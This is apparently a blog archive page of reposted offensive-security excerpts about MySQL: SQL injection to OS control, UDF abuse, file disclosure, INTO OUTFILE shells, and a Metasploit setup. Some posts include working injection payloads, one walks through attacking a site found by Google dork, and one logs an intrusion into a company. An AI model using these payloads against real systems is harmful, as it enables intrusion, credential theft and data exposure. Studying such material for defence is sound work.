Archive

Posts tagged ‘MySQL’

Advanced SQL injection to operating system full control

February 17, 2011 admin     1,593 views No comments

From:http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
April 10, 2009

This white paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicates with a database.
Over ten years have passed since a famous hacker coined the term SQL injection and it is still considered one of the major application threats. A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet.
This paper's aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system's underlying operating system, file system and internal network through a SQL injection vulnerability in overlooked and theoretically not exploitable scenarios.

Contents
I Introduction
1 SQL injection
2 Web application scripting languages
2.1 Batched queries
3 Batched queries via SQL injection
3.1 MySQL
3.2 PostgreSQL
3.3 Microsoft SQL Server

II File system access
4 Read access
4.1 MySQL
4.2 PostgreSQL
4.3 Microsoft SQL Server
5 Write access
5.1 MySQL
5.2 PostgreSQL
5.3 Microsoft SQL Server
III Operating system access
6 User-Defined Function
7 UDF injection
7.1 MySQL
7.1.1 Shared library creation
7.1.2 SQL injection to command execution
7.2 PostgreSQL
7.2.1 Shared library creation
7.2.2 SQL injection to command execution
8 Stored procedure
8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
8.1.2 SQL injection to command execution

IV Out-of-band connection
9 Stand-alone payload stager
9.1 Payload stager options
9.2 Session
10 SMB relay attack
10.1 Universal Naming Convention
10.2 Abuse UNC path requests
10.2.1 MySQL
10.2.2 PostgreSQL
10.2.3 Microsoft SQL Server

11 Stored procedure buffer overflow
11.1 Exploit
11.2 Memory protection
11.3 Bypass DEP

V Privilege escalation
VI Conclusion
12 Acknowledgments
Read more…

The Operation Outbreak Attack

December 28, 2010 admin     1,324 views No comments

The Operation Outbreak Attack

From:http://www.exploit-db.com/papers/15833/

|=——————————————————————–=|
|=—————-=[ The Operation OutBreak Attack ]=—————–=|
|=————————–=[ 26 Dec 2010 ]=————————-=|
|=———————-=[  By CWH Underground  ]=——————–=|
|=——————————————————————–=|

######
Info
######

Title    : The Operation OutBreak Attack
Author    : ZeQ3uL  (Prathan Phongthiproek)
Retool2 (Suttapong Wara-asawapati)
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Website    : www.citecclub.org
Date    : 2010-12-26

##########
Contents
##########

[0x00] – Introduction

[0x01] – OutBreak Web Application

[0x02] – OutBreak MySQL Database

[0x03] – OutBreak with Autosploit.rc

[0x04] – Outbreak to Internal Server

[0x05] – References

[0x06] – Greetz To

#######################
[0x00] – Introduction
#######################

Hi all, in this paper we will show you my hacking method (logs) from a real-world case study on some company.
Moreover, we also show the ways to use the best exploitation tool, Metasploit Framework (thanks HD Moore and Rapid7), which is more powerful than in the past, with many exploits and auxiliaries (we will see it ;D)

We recommend reading our previous paper “The Operation Cloudburst Attack”, which guides you through methods of hacking with Metasploit Framework.

###################################
[0x01] – OutBreak Web Application
###################################

First, I used nmap to scan for open ports on the target and found the information below
Read more…

Metasploit with MYSQL in BackTrack 4 r2

December 24, 2010 admin     1,648 views No comments

Metasploit with MYSQL in BackTrack 4 r2
From:http://hi.baidu.com/p3rlish/blog/item/de16d790f29e749fa977a4a3.html
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
root@bt:~# msfconsole

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect <user:pass>@<host:port>/<database>
[*]       OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3
Read more…

Some tricks for unconventional MySQL blind injection, by oldjun

May 6, 2010 admin     2,186 views No comments
Many of these tricks I learned from foreign papers, but few people in China use them, so I'm posting them here as notes.
I. Injection tricks for the ORDER BY parameter:
Two methods, same idea.
example. "select username,password from uc_members order by ".$_GET['oderby']
a. Common exploitation method:
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
Returns an error: [Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
Returns normally.
b. Method seen in a foreign paper:
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
Returns an error: [Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
Returns normally.
II. Injection tricks for the LIMIT parameter:
a. Injecting a LIMIT parameter that comes after ORDER BY: because in a normal SQL statement a UNION cannot follow ORDER BY, there is no good method, only one marginal idea: into outfile '/www/root/xxx.php';
b. Injection when there is no ORDER BY before LIMIT is much more convenient: a UNION SELECT can follow directly, and you can inject however you like:
Category: Penetration Testing

Exploiting MySQL User-Defined Functions (UDF) on Linux

April 13, 2010 admin     2,018 views No comments

Source: http://hi.baidu.com/ylbhz

Exploiting MySQL User-Defined Functions (UDF) on Linux

Chris Anley [chris@ngssoftware.com] 5th July 2004

MySQL's extensible function mechanism means that users can build their own shared libraries containing custom functions, known as user-defined functions (UDFs).

This is done with the CREATE FUNCTION statement, and the functions are loaded by entering records into the 'mysql.func' table.

Normally, when MySQL loads these shared libraries, the library file path must be accessible to MySQL.

An attacker can abuse this mechanism by crafting malicious shared library files and writing them to a usable directory with a SELECT … INTO OUTFILE statement. Once those files have been created, the attacker inserts records into the mysql.func table so that MySQL loads the libraries and executes the functions.

Below is a fairly simple piece of UDF library code (forgive how crude it is) (foreigners are so polite!):
Read more…

Category: Penetration Testing

A Brief Discussion of Exploiting Local File Disclosure Vulnerabilities

April 3, 2010 admin     1,892 views No comments

A Brief Discussion of Exploiting Local File Disclosure Vulnerabilities
This article first appeared in Hacker Defense (黑防) issue 1003; copyright belongs to the author and Hacker Defense. Do not reproduce without permission.
hackerxwar [0x50sec]
A file disclosure vulnerability lets us view arbitrary files that we should not be able to view but that the application has permission to access, such as the source code of PHP files, the connection file holding the database account and password, the server's account information files, configuration files, and so on. This leads to serious security problems. For example, knowing the MySQL database credentials, one can try logging into MySQL or phpMyAdmin and then write a shell directly with INTO OUTFILE, or log into the admin backend; reading source code also turns black-box testing into white-box testing, making it easier for an intruder to find other vulnerabilities and lowering the difficulty of intrusion.

Causes of file disclosure vulnerabilities and common exploitation methods

The cause of file disclosure vulnerabilities is simply insufficient checking of the parameters to file-operation functions such as readfile(), file_get_contents(), fopen(), file(), fgets(), fgetc()
and so on; in addition there is MySQL's load_file() function when the account has the file_priv privilege. The parameters of file-operation functions may be data supplied directly by the user via GPC input, or may be file paths stored in the database.
Exploiting LFD is really just reading files; common cases include:
If the backend login password is written in a configuration file, read the password and log into the backend directly
Read the MySQL database connection file and try logging into MySQL or phpMyAdmin
For MySQL 4.x versions, table names and database names can be viewed to assist SQL injection
Read /etc/passwd, database passwords and so on, and combine them with social engineering to try logging into FTP, the site backend, etc.
Finally, dig up other vulnerabilities by reading PHP source code

But in some situations reading files does not go smoothly; this article briefly discusses those situations, as a starting point for further discussion.

Read more…

MySQL: Secure Web Apps – SQL Injection techniques

March 29, 2010 admin     9,368 views No comments

/================================================================================\
———————————[ PLAYHACK.net ]———————————
\================================================================================/

-[ INFOS ]———————————————————————–
Title: “MySQL: Secure Web Apps – SQL Injection techniques”
Author: Omni
Website: http://omni.playhack.net
Date: 2009-02-26 (ISO 8601)
———————————————————————————

-[ SUMMARY ]———————————————————————
0x01: Introduction
0x02: Injecting SQL
0x03: Exploiting a Login Form
0x04: Exploiting Different SQL Statement Type
0x05: Basic Victim Fingerprinting
0x06: Standard Blind SQL Injection
0x07: Double Query
0x08: Filters Evasion
0x09: SQL Injection Prevention
0x10: Conclusion
———————————————————————————

Read more…

Category: Penetration Testing

A typical manual PHP+MySQL injection

March 4, 2010 root     2,091 views No comments

Hi everyone, I'm xxx. Bored, I looked for a website to practice on and asked Google for “inurl:php?id=80 site:XXX keyword”
and quickly found a vulnerable site:

http://www.hacked.cn/autocar/show.php?id=42

Adding "'" makes part of the page content disappear. and 1=1 is normal; and 1=2 disappears. An injection vulnerability exists; good, an easy target!
Determine the MySQL version:
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=4 normal
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=5 abnormal.
order by 1; order by 2 normal, order by 3 abnormal. Two columns.
Check basic information:
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(@@version,0x3a,database(),0x3a,user()),2
Read more…

[zz]Mysql Injection Into outfile Paper

February 5, 2010 admin     2,638 views No comments

From:http://www.milw0rm.com/papers/372
[!] Paper about: INTO OUTFILE (Mysql)
[!] Author: xados
[!] Contact: xados@hotmail.it
[!] Thanks to: Johannes Dahse, because this paper is from his mind.

[+1] The FILE privilege

If we want to read or write files we have to have the FILE privilege.
First, see which user we are in the DB with the code:

0' UNION SELECT current_user,null /*

You can put current_user, user() or system_user.

This will give us the username@server. //(normally ..@localhost)
Read more…

Summary of MySQL load_file()/into outfile path problems

February 5, 2010 admin     2,356 views No comments

A rough translation and write-up of

http://www.milw0rm.com/papers/372

Many people have summarized the conditions for MySQL into outfile:
1. The web service and MySQL run on the same server
2. MySQL version 3 or later
3. The file_priv privilege
4. magic_quotes=off
5. A known writable web path
load_file() does not need condition 4, but it still needs a path.

For into outfile, the fourth condition is often hard to satisfy on newer sites, and the fifth condition is sometimes not easy either.
The main discussion here is how to obtain the web path.
milw0rm.com has an article on this: http://www.milw0rm.com/papers/372
Read more…